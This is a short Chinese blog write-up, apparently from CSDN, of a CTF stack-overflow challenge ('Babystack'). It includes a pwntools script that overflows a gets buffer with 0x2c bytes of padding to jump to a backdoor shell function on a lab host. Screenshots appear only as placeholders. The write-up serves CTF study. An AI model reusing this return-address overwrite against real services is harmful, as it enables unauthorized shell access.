【CTF-Crypto实战-2023红队】Babystack

首先检查安全性

image-20230728101504697

发现后门函数

image-20230728101523727

发现溢出点get

image-20230728101529294

溢出buffer覆盖ebp+4地址段为shell 入口地址即可即可完成

image-20230728101535889

from pwn import *
context.arch = 'i386'
#io = process("./pp")
io = remote("172.16.30.11",18006)
#网络延迟较大,加上较好
pause()
p = flat(b'a'*0x2c, 0x8048486)
io.sendline(p) 
io.interactive()

改为远程调试io = remote(“172.16.30.11”,18006)

拿下

image-20230728101944168

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值